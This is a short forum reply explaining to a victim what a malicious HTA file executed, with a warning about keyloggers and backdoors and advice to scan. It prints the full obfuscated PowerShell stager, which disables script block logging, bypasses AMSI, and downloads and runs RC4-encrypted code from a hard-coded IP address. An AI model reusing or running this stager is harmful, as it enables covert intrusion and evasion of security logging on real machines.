RE:MalwareIf you executed the hta file it ran this powershell code:
If($PSVeRsiOnTABLE.PSVerSIOn.MAJOr -gE 3){$GPF=[REf].ASsEMbLY.GEtTYPe('System.Management.Automation.Utils')."GetFIE`lD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GETVAlUe($nUlL);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAl=[COLLEctioNs.GenerIC.DiCtIOnArY[StRiNg,SystEm.ObjEcT]]::nEW();$val.ADd('EnableScriptB'+'lockLogging',0);$VaL.ADD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$vaL}ElSe{[ScrIPTBLocK]."GEtFIE`lD"('signatures','N'+'onPublic,Static').SeTVaLUE($NUlL,(NEW-OBJect COllecTiOns.GENeRic.HAShSEt[sTrIng]))}[Ref].ASSEmBlY.GEtTyPe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIeld('amsiInitFailed','NonPublic,Static').SEtVALUE($nUlL,$trUe)};};[SysTeM.NET.SERViCEPoiNTManaGER]::EXPect100COnTiNue=0;$Wc=NEw-ObJEcT SystEM.NeT.WebCliEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeADers.ADD('User-Agent',$u);$Wc.ProxY=[SYstEM.NeT.WeBREQueST]::DEfAUlTWebPRoXY;$Wc.PRoXy.CreDeNTiALs = [SYSTEm.NEt.CREDeNTIAlCaChE]::DEFAULtNEtworkCreDenTIALS;$Script:Proxy = $wc.Proxy;$K=[SyStem.TeXt.ENCoDiNg]::ASCII.GetBYTes('(MW5V=Fhxkt2[<yj}:64,cRS&Cf{/T^3');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXor$S[($S[$I]+$S[$H])%256]}};$ser='https://31.41.220.9:80';$t='/login/process.php';$wc.HeadErs.AdD("Cookie","session=HFehNkrb97PGKURkEt72wLnPvb0=");$data=$WC.DoWnloAdDAta($sER+$t);$iv=$daTA[0..3];$daTa=$DAta[4..$data.LEnGth];-JoiN[Char[]](& $R $data ($IV+$K))|IEX
If it was a reverse-http hack then a black hat could have installed keylogger onto your machine and now knows your password. They likely would have installed a backdoor so that they can access your machine after you reboot. Scan your system!